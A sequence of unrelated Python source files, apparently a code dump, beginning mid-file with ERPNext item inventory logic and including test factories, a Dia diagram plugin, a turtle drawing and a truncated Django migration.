	def on_trash(self):
		super(Item, self).on_trash()
		frappe.db.sql("""delete from tabBin where item_code=%s""", self.name)
		frappe.db.sql("delete from `tabItem Price` where item_code=%s", self.name)
		for variant_of in frappe.get_all("Item", filters={"variant_of": self.name}):
			frappe.delete_doc("Item", variant_of.name)

	def before_rename(self, old_name, new_name, merge=False):
		if self.item_name == old_name:
			frappe.db.set_value("Item", old_name, "item_name", new_name)

		if merge:
			# Validate properties before merging
			if not frappe.db.exists("Item", new_name):
				frappe.throw(_("Item {0} does not exist").format(new_name))

			field_list = ["stock_uom", "is_stock_item", "has_serial_no", "has_batch_no"]
			new_properties = [cstr(d) for d in frappe.db.get_value("Item", new_name, field_list)]
			if new_properties != [cstr(self.get(fld)) for fld in field_list]:
				frappe.throw(_("To merge, following properties must be same for both items")
									+ ": \n" + ", ".join([self.meta.get_label(fld) for fld in field_list]))

	def after_rename(self, old_name, new_name, merge):
		if self.route:
			invalidate_cache_for_item(self)
			clear_cache(self.route)

		frappe.db.set_value("Item", new_name, "item_code", new_name)

		if merge:
			self.set_last_purchase_rate(new_name)
			self.recalculate_bin_qty(new_name)

		for dt in ("Sales Taxes and Charges", "Purchase Taxes and Charges"):
			for d in frappe.db.sql("""select name, item_wise_tax_detail from `tab{0}`
					where ifnull(item_wise_tax_detail, '') != ''""".format(dt), as_dict=1):

				item_wise_tax_detail = json.loads(d.item_wise_tax_detail)
				if isinstance(item_wise_tax_detail, dict) and old_name in item_wise_tax_detail:
					item_wise_tax_detail[new_name] = item_wise_tax_detail[old_name]
					item_wise_tax_detail.pop(old_name)

					frappe.db.set_value(dt, d.name, "item_wise_tax_detail",
											json.dumps(item_wise_tax_detail), update_modified=False)

	def set_last_purchase_rate(self, new_name):
		last_purchase_rate = get_last_purchase_details(new_name).get("base_rate", 0)
		frappe.db.set_value("Item", new_name, "last_purchase_rate", last_purchase_rate)

	def recalculate_bin_qty(self, new_name):
		from erpnext.stock.stock_balance import repost_stock
		frappe.db.auto_commit_on_many_writes = 1
		existing_allow_negative_stock = frappe.db.get_value("Stock Settings", None, "allow_negative_stock")
		frappe.db.set_value("Stock Settings", None, "allow_negative_stock", 1)

		repost_stock_for_warehouses = frappe.db.sql_list("""select distinct warehouse
			from tabBin where item_code=%s""", new_name)

		# Delete all existing bins to avoid duplicate bins for the same item and warehouse
		frappe.db.sql("delete from `tabBin` where item_code=%s", new_name)

		for warehouse in repost_stock_for_warehouses:
			repost_stock(new_name, warehouse)

		frappe.db.set_value("Stock Settings", None, "allow_negative_stock", existing_allow_negative_stock)
		frappe.db.auto_commit_on_many_writes = 0

	def copy_specification_from_item_group(self):
		self.set("website_specifications", [])
		if self.item_group:
			for label, desc in frappe.db.get_values("Item Website Specification",
										   {"parent": self.item_group}, ["label", "description"]):
				row = self.append("website_specifications")
				row.label = label
				row.description = desc

	def update_bom_item_desc(self):
		if self.is_new():
			return

		if self.db_get('description') != self.description:
			frappe.db.sql("""
				update `tabBOM`
				set description = %s
				where item = %s and docstatus < 2
			""", (self.description, self.name))

			frappe.db.sql("""
				update `tabBOM Item`
				set description = %s
				where item_code = %s and docstatus < 2
			""", (self.description, self.name))

			frappe.db.sql("""
				update `tabBOM Explosion Item`
				set description = %s
				where item_code = %s and docstatus < 2
			""", (self.description, self.name))

	def update_template_item(self):
		"""Set Show in Website for Template Item if True for its Variant"""
		if self.variant_of:
			if self.show_in_website:
				self.show_variant_in_website = 1
				self.show_in_website = 0

			if self.show_variant_in_website:
				# show template
				template_item = frappe.get_doc("Item", self.variant_of)

				if not template_item.show_in_website:
					template_item.show_in_website = 1
					template_item.flags.dont_update_variants = True
					template_item.flags.ignore_permissions = True
					template_item.save()

	def validate_item_defaults(self):
		companies = list(set([row.company for row in self.item_defaults]))

		if len(companies) != len(self.item_defaults):
			frappe.throw(_("Cannot set multiple Item Defaults for a company."))

	def update_defaults_from_item_group(self):
		"""Get defaults from Item Group"""
		if self.item_group and not self.item_defaults:
			item_defaults = frappe.db.get_values("Item Default", {"parent": self.item_group},
				['company', 'default_warehouse','default_price_list','buying_cost_center','default_supplier',
				'expense_account','selling_cost_center','income_account'], as_dict = 1)
			if item_defaults:
				for item in item_defaults:
					self.append('item_defaults', {
						'company': item.company,
						'default_warehouse': item.default_warehouse,
						'default_price_list': item.default_price_list,
						'buying_cost_center': item.buying_cost_center,
						'default_supplier': item.default_supplier,
						'expense_account': item.expense_account,
						'selling_cost_center': item.selling_cost_center,
						'income_account': item.income_account
					})
			else:
				warehouse = ''
				defaults = frappe.defaults.get_defaults() or {}

				# To check default warehouse is belong to the default company
				if defaults.get("default_warehouse") and frappe.db.exists("Warehouse",
					{'name': defaults.default_warehouse, 'company': defaults.company}):
					warehouse = defaults.default_warehouse

				self.append("item_defaults", {
					"company": defaults.get("company"),
					"default_warehouse": warehouse
				})

	def update_variants(self):
		if self.flags.dont_update_variants or \
						frappe.db.get_single_value('Item Variant Settings', 'do_not_update_variants'):
			return
		if self.has_variants:
			variants = frappe.db.get_all("Item", fields=["item_code"], filters={"variant_of": self.name})
			if variants:
				if len(variants) <= 30:
					update_variants(variants, self, publish_progress=False)
					frappe.msgprint(_("Item Variants updated"))
				else:
					frappe.enqueue("erpnext.stock.doctype.item.item.update_variants",
						variants=variants, template=self, now=frappe.flags.in_test, timeout=600)

	def validate_has_variants(self):
		if not self.has_variants and frappe.db.get_value("Item", self.name, "has_variants"):
			if frappe.db.exists("Item", {"variant_of": self.name}):
				frappe.throw(_("Item has variants."))

	def validate_stock_exists_for_template_item(self):
		if self.stock_ledger_created() and self._doc_before_save:
			if (cint(self._doc_before_save.has_variants) != cint(self.has_variants)
				or self._doc_before_save.variant_of != self.variant_of):
				frappe.throw(_("Cannot change Variant properties after stock transaction. You will have to make a new Item to do this.").format(self.name),
					StockExistsForTemplate)

			if self.has_variants or self.variant_of:
				if not self.is_child_table_same('attributes'):
					frappe.throw(
						_('Cannot change Attributes after stock transaction. Make a new Item and transfer stock to the new Item'))

	def validate_variant_based_on_change(self):
		if not self.is_new() and (self.variant_of or (self.has_variants and frappe.get_all("Item", {"variant_of": self.name}))):
			if self.variant_based_on != frappe.db.get_value("Item", self.name, "variant_based_on"):
				frappe.throw(_("Variant Based On cannot be changed"))

	def validate_uom(self):
		if not self.get("__islocal"):
			check_stock_uom_with_bin(self.name, self.stock_uom)
		if self.has_variants:
			for d in frappe.db.get_all("Item", filters={"variant_of": self.name}):
				check_stock_uom_with_bin(d.name, self.stock_uom)
		if self.variant_of:
			template_uom = frappe.db.get_value("Item", self.variant_of, "stock_uom")
			if template_uom != self.stock_uom:
				frappe.throw(_("Default Unit of Measure for Variant '{0}' must be same as in Template '{1}'")
									.format(self.stock_uom, template_uom))

	def validate_uom_conversion_factor(self):
		if self.uoms:
			for d in self.uoms:
				value = get_uom_conv_factor(d.uom, self.stock_uom)
				if value:
					d.conversion_factor = value

	def validate_attributes(self):
		if not (self.has_variants or self.variant_of):
			return

		if not self.variant_based_on:
			self.variant_based_on = 'Item Attribute'

		if self.variant_based_on == 'Item Attribute':
			attributes = []
			if not self.attributes:
				frappe.throw(_("Attribute table is mandatory"))
			for d in self.attributes:
				if d.attribute in attributes:
					frappe.throw(
						_("Attribute {0} selected multiple times in Attributes Table".format(d.attribute)))
				else:
					attributes.append(d.attribute)

	def validate_variant_attributes(self):
		if self.is_new() and self.variant_of and self.variant_based_on == 'Item Attribute':
			args = {}
			for d in self.attributes:
				if cstr(d.attribute_value).strip() == '':
					frappe.throw(_("Please specify Attribute Value for attribute {0}").format(d.attribute))
				args[d.attribute] = d.attribute_value

			variant = get_variant(self.variant_of, args, self.name)
			if variant:
				frappe.throw(_("Item variant {0} exists with same attributes")
					.format(variant), ItemVariantExistsError)

			validate_item_variant_attributes(self, args)

	def validate_stock_for_has_batch_and_has_serial(self):
		if self.stock_ledger_created():
			for value in ["has_batch_no", "has_serial_no"]:
				if frappe.db.get_value("Item", self.name, value) != self.get_value(value):
					frappe.throw(_("Cannot change {0} as Stock Transaction for Item {1} exist.".format(value, self.name)))

def get_timeline_data(doctype, name):
	'''returns timeline data based on stock ledger entry'''
	out = {}
	items = dict(frappe.db.sql('''select posting_date, count(*)
		from `tabStock Ledger Entry` where item_code=%s
			and posting_date > date_sub(curdate(), interval 1 year)
			group by posting_date''', name))

	for date, count in iteritems(items):
		timestamp = get_timestamp(date)
		out.update({timestamp: count})

	return out


def validate_end_of_life(item_code, end_of_life=None, disabled=None, verbose=1):
	if (not end_of_life) or (disabled is None):
		end_of_life, disabled = frappe.db.get_value("Item", item_code, ["end_of_life", "disabled"])

	if end_of_life and end_of_life != "0000-00-00" and getdate(end_of_life) <= now_datetime().date():
		msg = _("Item {0} has reached its end of life on {1}").format(item_code, formatdate(end_of_life))
		_msgprint(msg, verbose)

	if disabled:
		_msgprint(_("Item {0} is disabled").format(item_code), verbose)


def validate_is_stock_item(item_code, is_stock_item=None, verbose=1):
	if not is_stock_item:
		is_stock_item = frappe.db.get_value("Item", item_code, "is_stock_item")

	if is_stock_item != 1:
		msg = _("Item {0} is not a stock Item").format(item_code)

		_msgprint(msg, verbose)


def validate_cancelled_item(item_code, docstatus=None, verbose=1):
	if docstatus is None:
		docstatus = frappe.db.get_value("Item", item_code, "docstatus")

	if docstatus == 2:
		msg = _("Item {0} is cancelled").format(item_code)
		_msgprint(msg, verbose)


def _msgprint(msg, verbose):
	if verbose:
		msgprint(msg, raise_exception=True)
	else:
		raise frappe.ValidationError(msg)


def get_last_purchase_details(item_code, doc_name=None, conversion_rate=1.0):
	"""returns last purchase details in stock uom"""
	# get last purchase order item details
	last_purchase_order = frappe.db.sql("""\
		select po.name, po.transaction_date, po.conversion_rate,
			po_item.conversion_factor, po_item.base_price_list_rate,
			po_item.discount_percentage, po_item.base_rate
		from `tabPurchase Order` po, `tabPurchase Order Item` po_item
		where po.docstatus = 1 and po_item.item_code = %s and po.name != %s and
			po.name = po_item.parent
		order by po.transaction_date desc, po.name desc
		limit 1""", (item_code, cstr(doc_name)), as_dict=1)

	# get last purchase receipt item details
	last_purchase_receipt = frappe.db.sql("""\
		select pr.name, pr.posting_date, pr.posting_time, pr.conversion_rate,
			pr_item.conversion_factor, pr_item.base_price_list_rate, pr_item.discount_percentage,
			pr_item.base_rate
		from `tabPurchase Receipt` pr, `tabPurchase Receipt Item` pr_item
		where pr.docstatus = 1 and pr_item.item_code = %s and pr.name != %s and
			pr.name = pr_item.parent
		order by pr.posting_date desc, pr.posting_time desc, pr.name desc
		limit 1""", (item_code, cstr(doc_name)), as_dict=1)

	purchase_order_date = getdate(last_purchase_order and last_purchase_order[0].transaction_date
							   or "1900-01-01")
	purchase_receipt_date = getdate(last_purchase_receipt and
								 last_purchase_receipt[0].posting_date or "1900-01-01")

	if (purchase_order_date > purchase_receipt_date) or \
				(last_purchase_order and not last_purchase_receipt):
		# use purchase order
		last_purchase = last_purchase_order[0]
		purchase_date = purchase_order_date

	elif (purchase_receipt_date > purchase_order_date) or \
				(last_purchase_receipt and not last_purchase_order):
		# use purchase receipt
		last_purchase = last_purchase_receipt[0]
		purchase_date = purchase_receipt_date

	else:
		return frappe._dict()

	conversion_factor = flt(last_purchase.conversion_factor)
	out = frappe._dict({
		"base_price_list_rate": flt(last_purchase.base_price_list_rate) / conversion_factor,
		"base_rate": flt(last_purchase.base_rate) / conversion_factor,
		"discount_percentage": flt(last_purchase.discount_percentage),
		"purchase_date": purchase_date
	})

	conversion_rate = flt(conversion_rate) or 1.0
	out.update({
		"price_list_rate": out.base_price_list_rate / conversion_rate,
		"rate": out.base_rate / conversion_rate,
		"base_rate": out.base_rate
	})

	return out


def invalidate_cache_for_item(doc):
	invalidate_cache_for(doc, doc.item_group)

	website_item_groups = list(set((doc.get("old_website_item_groups") or [])
								+ [d.item_group for d in doc.get({"doctype": "Website Item Group"}) if d.item_group]))

	for item_group in website_item_groups:
		invalidate_cache_for(doc, item_group)

	if doc.get("old_item_group") and doc.get("old_item_group") != doc.item_group:
		invalidate_cache_for(doc, doc.old_item_group)


def check_stock_uom_with_bin(item, stock_uom):
	if stock_uom == frappe.db.get_value("Item", item, "stock_uom"):
		return

	matched = True
	ref_uom = frappe.db.get_value("Stock Ledger Entry",
							   {"item_code": item}, "stock_uom")

	if ref_uom:
		if cstr(ref_uom) != cstr(stock_uom):
			matched = False
	else:
		bin_list = frappe.db.sql("select * from tabBin where item_code=%s", item, as_dict=1)
		for bin in bin_list:
			if (bin.reserved_qty > 0 or bin.ordered_qty > 0 or bin.indented_qty > 0
								or bin.planned_qty > 0) and cstr(bin.stock_uom) != cstr(stock_uom):
				matched = False
				break

		if matched and bin_list:
			frappe.db.sql("""update tabBin set stock_uom=%s where item_code=%s""", (stock_uom, item))

	if not matched:
		frappe.throw(
			_("Default Unit of Measure for Item {0} cannot be changed directly because you have already made some transaction(s) with another UOM. You will need to create a new Item to use a different Default UOM.").format(item))

def get_item_defaults(item_code, company):
	item = frappe.get_cached_doc('Item', item_code)

	out = item.as_dict()

	for d in item.item_defaults:
		if d.company == company:
			row = copy.deepcopy(d.as_dict())
			row.pop("name")
			out.update(row)
	return out

def set_item_default(item_code, company, fieldname, value):
	item = frappe.get_cached_doc('Item', item_code)

	for d in item.item_defaults:
		if d.company == company:
			if not d.get(fieldname):
				frappe.db.set_value(d.doctype, d.name, fieldname, value)
			return

	# no row found, add a new row for the company
	d = item.append('item_defaults', {fieldname: value, "company": company})
	d.db_insert()
	item.clear_cache()

@frappe.whitelist()
def get_uom_conv_factor(uom, stock_uom):
	uoms = [uom, stock_uom]
	value = ""
	uom_details = frappe.db.sql("""select to_uom, from_uom, value from `tabUOM Conversion Factor`\
		where to_uom in ({0})
		""".format(', '.join(['"' + frappe.db.escape(i, percent=False) + '"' for i in uoms])), as_dict=True)

	for d in uom_details:
		if d.from_uom == stock_uom and d.to_uom == uom:
			value = 1/flt(d.value)
		elif d.from_uom == uom and d.to_uom == stock_uom:
			value = d.value

	if not value:
		uom_stock = frappe.db.get_value("UOM Conversion Factor", {"to_uom": stock_uom}, ["from_uom", "value"], as_dict=1)
		uom_row = frappe.db.get_value("UOM Conversion Factor", {"to_uom": uom}, ["from_uom", "value"], as_dict=1)

		if uom_stock and uom_row:
			if uom_stock.from_uom == uom_row.from_uom:
				value = flt(uom_stock.value) * 1/flt(uom_row.value)

	return value

@frappe.whitelist()
def get_item_attribute(parent, attribute_value=''):
	if not frappe.has_permission("Item"):
		frappe.msgprint(_("No Permission"), raise_exception=1)

	return frappe.get_all("Item Attribute Value", fields = ["attribute_value"],
		filters = {'parent': parent, 'attribute_value': ("like", "%%%s%%" % attribute_value)})

def update_variants(variants, template, publish_progress=True):
	count=0
	for d in variants:
		variant = frappe.get_doc("Item", d)
		copy_attributes_to_variant(template, variant)
		variant.save()
		count+=1
		if publish_progress:
				frappe.publish_progress(count*100/len(variants), title = _("Updating Variants..."))

import unittest
import os
from ui import main

print os.getcwd()

class TestMain(unittest.TestCase):
    def setUp(self):
        self.m = main.MainWindow()
    
    def test_mainWindow(self):
        assert(self.m)
    
    def test_dataframe(self):
        import numpy
        #Random 25x4 Numpy Matrix
        self.m.render_dataframe(numpy.random.rand(25,4) ,name='devel',rownames=xrange(0,25))
        assert(self.m.active_robject)
        assert(self.m.active_robject.columns)
        assert(self.m.active_robject.column_data)
        
    def test_imports(self):
        datasets = ['iris','Nile','morley','freeny','sleep','mtcars']
        for a in datasets:
            main.rsession.r('%s=%s' % (a,a))
            self.m.sync_with_r()
            assert(a in self.m.robjects)
                
unittest.main()
from datetime import datetime

import factory

from zds.forum.factories import PostFactory, TopicFactory
from zds.gallery.factories import GalleryFactory, UserGalleryFactory
from zds.utils.factories import LicenceFactory, SubCategoryFactory
from zds.utils.models import Licence
from zds.tutorialv2.models.database import PublishableContent, Validation, ContentReaction
from zds.tutorialv2.models.versioned import Container, Extract
from zds.tutorialv2.publication_utils import publish_content
from zds.tutorialv2.utils import init_new_repo

text_content = "Ceci est un texte bidon, **avec markown**"

tricky_text_content = (
    "Ceci est un texte contenant plein d'images, pour la publication. Le modifier affectera le test !\n\n"
    "# Les images\n\n"
    "Image: ![PNG qui existe](https://upload.wikimedia.org/wikipedia/commons/2/24/"
    "Derivative_of_medical_imaging.jpg)\n\n"
    "Image: ![PNG qui existe pas](example.com/test.png)\n\n"
    "Image: ![SVG qui existe](https://upload.wikimedia.org/wikipedia/commons/f/f9/10DF.svg)\n\n"
    "Image: ![SVG qui existe pas](example.com/test.svg)\n\n"
    "Image: ![GIF qui existe](https://upload.wikimedia.org/wikipedia/commons/2/27/AnimatedStar.gif)\n\n"
    "Image: ![GIF qui existe pas](example.com/test.gif)\n\n"
    "Image: ![Image locale qui existe pas](does-not-exist/test.png)\n\n"
    "Image: ![Bonus: image bizarre](https://s2.qwant.com/thumbr/300x0/e/7/"
    "56e2a2bdcd656d0b8a29c650116e29e893239089f71adf128d5f06330703b1/1024px-"
    "Oh_my_darling.jpg?u=https%3A%2F%2Fupload"
    ".wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2Fa%2Fa9%2FOh_my_darling.jpg%2F1024px-"
    "Oh_my_darling.jpg&q=0&b=0&p=0&a=0)\n\n"
    "Image: ![Bonus: le serveur existe pas !](http://unknown.image.zds/test.png)\n\n"
    "Image: ![Bonus: juste du texte](URL invalide)\n\n"
    "# Et donc ...\n\n"
    "Voilà :)"
)


class PublishableContentFactory(factory.django.DjangoModelFactory):
    """
    Factory that creates a PublishableContent.
    """

    class Meta:
        model = PublishableContent

    title = factory.Sequence("Mon contenu No{}".format)
    description = factory.Sequence("Description du contenu No{}".format)
    type = "TUTORIAL"
    creation_date = datetime.now()
    pubdate = datetime.now()

    @classmethod
    def _generate(cls, create, attrs):
        # These parameters are only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (they are removed from attrs).
        light = attrs.pop("light", True)
        author_list = attrs.pop("author_list", None)
        add_license = attrs.pop("add_license", True)
        add_category = attrs.pop("add_category", True)

        # This parameter will be saved in the database,
        # which is why we use attrs.get() (it stays in attrs).
        licence = attrs.get("licence", None)

        auths = author_list or []
        if add_license:
            given_licence = licence or Licence.objects.first()
            if isinstance(given_licence, str) and given_licence:
                given_licence = Licence.objects.filter(title=given_licence).first() or Licence.objects.first()
            licence = given_licence or LicenceFactory()

        text = text_content
        if not light:
            text = tricky_text_content

        publishable_content = super()._generate(create, attrs)
        publishable_content.gallery = GalleryFactory()
        publishable_content.licence = licence
        for auth in auths:
            publishable_content.authors.add(auth)

        if add_category:
            publishable_content.subcategory.add(SubCategoryFactory())

        publishable_content.save()

        for author in publishable_content.authors.all():
            UserGalleryFactory(user=author, gallery=publishable_content.gallery, mode="W")

        init_new_repo(publishable_content, text, text)

        return publishable_content


class ContainerFactory(factory.Factory):
    """
    Factory that creates a Container.
    """

    class Meta:
        model = Container

    title = factory.Sequence(lambda n: "Mon container No{}".format(n + 1))

    @classmethod
    def _generate(cls, create, attrs):
        # These parameters are only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (they are removed from attrs).
        db_object = attrs.pop("db_object", None)
        light = attrs.pop("light", True)

        # This parameter will be saved in the database,
        # which is why we use attrs.get() (it stays in attrs).
        parent = attrs.get("parent", None)

        # Needed because we use container.title later
        container = super()._generate(create, attrs)

        text = text_content
        if not light:
            text = tricky_text_content

        sha = parent.repo_add_container(container.title, text, text)
        container = parent.children[-1]

        if db_object:
            db_object.sha_draft = sha
            db_object.save()

        return container


class ExtractFactory(factory.Factory):
    """
    Factory that creates a Extract.
    """

    class Meta:
        model = Extract

    title = factory.Sequence(lambda n: "Mon extrait No{}".format(n + 1))

    @classmethod
    def _generate(cls, create, attrs):
        # These parameters are only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (they are removed from attrs).
        light = attrs.pop("light", True)
        db_object = attrs.pop("db_object", None)

        # This parameter will be saved in the database,
        # which is why we use attrs.get() (it stays in attrs).
        container = attrs.get("container", None)

        # Needed because we use extract.title later
        extract = super()._generate(create, attrs)

        parent = container
        text = text_content
        if not light:
            text = tricky_text_content

        sha = parent.repo_add_extract(extract.title, text)
        extract = parent.children[-1]

        if db_object:
            db_object.sha_draft = sha
            db_object.save()

        return extract


class ContentReactionFactory(factory.django.DjangoModelFactory):
    """
    Factory that creates a ContentReaction.
    """

    class Meta:
        model = ContentReaction

    ip_address = "192.168.3.1"
    text = "Bonjour, je me présente, je m'appelle l'homme au texte bidonné"

    @classmethod
    def _generate(cls, create, attrs):
        note = super()._generate(create, attrs)
        note.pubdate = datetime.now()
        note.save()
        note.related_content.last_note = note
        note.related_content.save()
        return note


class BetaContentFactory(PublishableContentFactory):
    """
    Factory that creates a PublishableContent with a beta version and a beta topic.
    """

    @classmethod
    def _generate(cls, create, attrs):
        # This parameter is only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (it is removed from attrs).
        beta_forum = attrs.pop("forum", None)

        # Creates the PublishableContent (see PublishableContentFactory._generate() for more info)
        publishable_content = super()._generate(create, attrs)

        if publishable_content.authors.count() > 0 and beta_forum is not None:
            beta_topic = TopicFactory(
                title="[beta]" + publishable_content.title, author=publishable_content.authors.first(), forum=beta_forum
            )
            publishable_content.sha_beta = publishable_content.sha_draft
            publishable_content.beta_topic = beta_topic
            publishable_content.save()
            PostFactory(topic=beta_topic, position=1, author=publishable_content.authors.first())
            beta_topic.save()
        return publishable_content


class PublishedContentFactory(PublishableContentFactory):
    """
    Factory that creates a PublishableContent and the publish it.
    """

    @classmethod
    def _generate(cls, create, attrs):
        # This parameter is only used inside _generate() and won't be saved in the database,
        # which is why we use attrs.pop() (it is removed from attrs).
        is_major_update = attrs.pop("is_major_update", True)

        # Creates the PublishableContent (see PublishableContentFactory._generate() for more info)
        content = super()._generate(create, attrs)

        published = publish_content(content, content.load_version(), is_major_update)
        content.sha_public = content.sha_draft
        content.public_version = published

        content.save()

        return content


class ValidationFactory(factory.django.DjangoModelFactory):
    """
    Factory that creates a Validation.
    """

    class Meta:
        model = Validation

#
# -*- coding: utf-8 -*-
# Dia Group Resize Plugin
# Copyright (c) 2015, Alexandre Machado <axmachado@gmail.com>
# 
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#

import sys, dia
import os
import pygtk
pygtk.require("2.0")
import gtk
import locale

class ResizeWindow(object):    
    
    def __init__(self, group, data):
        self.group = group
        self.data = data
        self.initWindow()

    def initWindow(self):
        self.dlg = gtk.Dialog()
        self.dlg.set_title('Group Resize')
        self.dlg.set_border_width(6)
        self.dlg.vbox.pack_start(self.dialogContents(), fill=True, expand=True, padding=5)
        self.dlg.add_button(gtk.STOCK_APPLY, gtk.RESPONSE_APPLY)
        self.dlg.add_button(gtk.STOCK_CLOSE, gtk.RESPONSE_CLOSE)
        self.dlg.set_has_separator(True)
        self.dlg.set_modal(False)
        self.dlg.get_widget_for_response(gtk.RESPONSE_CLOSE).connect("clicked", self.hide, None)
        self.dlg.get_widget_for_response(gtk.RESPONSE_APPLY).connect("clicked", self.clickAplicar, None)

    def dimensionsFrame(self, label):       
        frame = gtk.Frame(label)
        table = gtk.Table(rows=4, columns=2)
        ignore = gtk.RadioButton(group=None, label="do not change")
        ignore.show()
        smallest = gtk.RadioButton(group=ignore, label="shrink to smallest")
        smallest.show()
        largest = gtk.RadioButton(group=ignore, label="enlarge to largest")
        largest.show()
        specify = gtk.RadioButton(group=ignore, label="resize to:")        
        specify.show()
        value = gtk.Entry()
        value.show()
        specify.connect("toggled", self.enableValueEntry, value)
        self.enableValueEntry(specify, value)
        table.attach (ignore, 0, 1, 0, 1)
        table.attach (smallest, 0, 1, 1, 2)
        table.attach (largest, 0, 1, 2, 3)
        table.attach (specify, 0, 1, 3, 4)
        table.attach (value, 1, 2, 3, 4)
        frame.add(table)
        table.show()
        frame.show()

        options = {
            'ignore': ignore,
            'smallest': smallest,
            'largest': largest,
            'specify': specify,
            'value': value
        }        
        return frame, options

    def enableValueEntry(self, radioSpecify, entrySpecify, *args):
        entrySpecify.set_sensitive(radioSpecify.get_active())
    
    def contentsFrameWidth(self):
        frame, self.widthOptions = self.dimensionsFrame('Width')
        return frame

    def contentsFrameHeight(self):
        frame, self.heightOptions = self.dimensionsFrame('Height')
        return frame
    
    def dialogContents(self):        
        contents = gtk.VBox(spacing=5)
        contents.pack_start(self.contentsFrameWidth(), fill=True, expand=True)
        contents.pack_start(self.contentsFrameHeight(), fill=True, expand=True)
        contents.show()
        return contents

    def getSelectedGroupOption(self, options):
        value = options['value'].get_text()
        for opt in 'ignore', 'smallest', 'largest', 'specify':
            if options[opt].get_active():
                return (opt,value)
        return ('ignore',value)

    def getValue(self, opt, value, elProperty):
        if opt == 'specify':
            return self.toFloat(value)
        else:
            values = [ x.properties[elProperty].value for x in self.group if x.properties.has_key(elProperty) ]
            if opt == 'smallest':
                return min(values)
            else:
                return max(values)

    def adjustWidth(self, value):
        for obj in self.group:
            pos = obj.properties['obj_pos'].value
            if obj.properties.has_key("elem_width"):
                difference = value - obj.properties['elem_width'].value
                handleLeft = obj.handles[3]
                handleRight = obj.handles[4]
                amount = difference/2
                obj.move_handle(handleLeft, (handleLeft.pos.x - amount, handleLeft.pos.y), 0, 0)
                obj.move_handle(handleRight, (handleRight.pos.x + amount, handleRight.pos.y), 0, 0)
                obj.move(pos.x, pos.y)

    def adjustHeight(self, value):
        for obj in self.group:
            pos = obj.properties['obj_pos'].value
            if obj.properties.has_key("elem_height"):
                difference = value - obj.properties['elem_height'].value
                handleTop = obj.handles[1]
                handleBottom = obj.handles[6]
                amount = difference/2
                obj.move_handle(handleTop, (handleTop.pos.x, handleTop.pos.y - amount), 0, 0)
                obj.move_handle(handleBottom, (handleBottom.pos.x, handleBottom.pos.y + amount), 0, 0)
                obj.move(pos.x, pos.y)
                

    def toFloat(self, valor):
        return locale.atof(valor)
                
    def clickAplicar(self, *args):
        optWidth = self.getSelectedGroupOption(self.widthOptions)
        optHeight = self.getSelectedGroupOption(self.heightOptions)

        try:
            if optWidth[0] != 'ignore':
                width = self.getValue(optWidth[0], optWidth[1], 'elem_width')
                self.adjustWidth(width)
            if optHeight[0] != 'ignore':
                height = self.getValue(optHeight[0], optHeight[1], 'elem_height')
                self.adjustHeight(height)

            if dia.active_display():
                diagram = dia.active_display().diagram
                for obj in self.group:
                    diagram.update_connections(obj)
                    
        except Exception,e:
            dia.message(gtk.MESSAGE_ERROR, repr(e))

        if dia.active_display():
            dia.active_display().add_update_all()
            dia.active_display().flush()

            
    def show(self):
        self.dlg.show()
        
    def hide(self, *args):
        self.dlg.hide()

    def run(self):
        return self.dlg.run()
        
def dia_group_resize_db (data,flags):
    diagram = dia.active_display().diagram
    group = diagram.get_sorted_selected()
    if len(group) > 0:
        win = ResizeWindow(group, data)
        win.show()
    else:
        dia.message(gtk.MESSAGE_INFO, "Please select a group of objects")

dia.register_action("ObjectGroupResize", "Group Resize",
                    "/DisplayMenu/Objects/ObjectsExtensionStart",
                    dia_group_resize_db)

from ..models import Album
from ..resource import SingleResource, ListResource
from ..schemas import AlbumSchema


class SingleAlbum(SingleResource):
    schema = AlbumSchema()
    routes = ('/album/<int:id>/',)
    model = Album


class ListAlbums(ListResource):
    schema = AlbumSchema(many=True)
    routes = ('/album/', '/tracklist/')
    model = Album

"""
System plugin
Copyright (C) 2016 Walid Benghabrit

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
from accmon.plugins.plugin import *


class System(Plugin):

    def __init__(self):
        super().__init__()

    def handle_request(self, request):
        res = super(System, self).handle_request(request)
        if res is not None: return res

#!/usr/bin/env python
import turtle
import random

def bloom(radius):
    turtle.colormode(255)

    for rad in range(40, 10, -5):
        for looper in range(360//rad):
            turtle.up()
            turtle.circle(radius+rad, rad)
            turtle.begin_fill()
            turtle.fillcolor((200+random.randint(0, rad),
                              200+random.randint(0, rad),
                              200+random.randint(0, rad)))
            turtle.down()
            turtle.circle(-rad)
            turtle.end_fill()


def main():
    """Simple flower, using global turtle instance"""
    turtle.speed(0)
    turtle.colormode(1.0)
    bloom(5)
    turtle.exitonclick()

###

if __name__ == "__main__":
    main()

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('characters', '0011_auto_20160212_1144'),
    ]

    operations = [
        migrations.CreateModel(
            name='CharacterSpells',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('character', models.ForeignKey(verbose_name='Karakt\xe4r', to='characters.Character')),
            ],
            options={
                'verbose_name': 'Karakt\xe4rers magi',
                'verbose_name_plural': 'Karakt\xe4rers magi',
            },
        ),
        migrations.AlterModelOptions(
            name='spellextras',
            options={'verbose_name': 'Magi extra', 'verbose_name_plural': 'Magi extra'},
        ),
        migrations.AlterModelOptions(
            name='spellinfo',
            options={'verbose_name': 'Magi information', 'verbose_name_plural': 'Magi information'},
        ),
        migrations.AddField(
            model_name='spellinfo',
            name='name',
